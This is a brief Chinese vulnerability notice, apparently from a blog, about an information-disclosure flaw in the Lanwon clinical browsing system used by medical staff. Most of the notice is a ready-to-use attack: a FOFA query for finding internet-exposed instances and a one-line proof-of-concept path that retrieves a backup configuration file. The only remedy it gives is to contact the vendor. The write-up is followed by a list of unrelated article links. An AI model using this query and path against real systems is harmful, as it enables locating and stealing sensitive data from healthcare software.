Nx01 产品简介
蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。
Nx02 漏洞描述
蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。
Nx03 产品主页
fofa-query: title=="临床浏览"
Nx04 漏洞复现
POC:
/config/config%20bak.txt
Nx05 修复建议
建议联系软件厂商进行处理。
相关推荐
HMS Core11 分钟前
HarmonyOS免密认证方案 助力应用登录安全升级再见晴天*_*13 分钟前
logback 日志不打印bing_15819 分钟前
MQTT 和 HTTP 有什么本质区别?Gauss松鼠会1 小时前
GaussDB权限管理:从RBAC到精细化控制的企业级安全实践myskybeyond1 小时前
时序数据库TDEngine安装和使用杨浦老苏2 小时前
Docker端口映射查看工具Dockpeekmyloveasuka2 小时前
[Linux]内核如何对信号进行捕捉未来之窗软件服务2 小时前
通过网页调用身份证阅读器http websocket方法-华视电子————仙盟创梦IDE渲吧-云渲染2 小时前
云渲染时,电脑能关机吗?关键阶段操作指南BD_Marathon2 小时前
Ubuntu下的Tomcat服务器部署